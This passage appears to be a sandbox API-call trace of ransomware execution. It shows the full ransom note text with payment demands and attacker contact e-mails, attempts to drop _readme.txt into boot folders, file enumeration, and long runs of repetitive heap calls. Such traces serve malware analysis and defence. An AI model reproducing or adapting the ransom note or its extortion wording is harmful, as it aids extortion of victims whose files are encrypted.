decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.896] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.897] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*" (normalized: "c:\\boot\\zh-tw\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.897] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.897] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.898] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0179.898] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.899] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.900] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.900] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0179.900] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0179.903] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0179.903] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0179.906] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0179.907] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0179.909] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0179.909] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0179.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0179.928] RtlAllocateHeap (HeapHandle=0x6a0000, 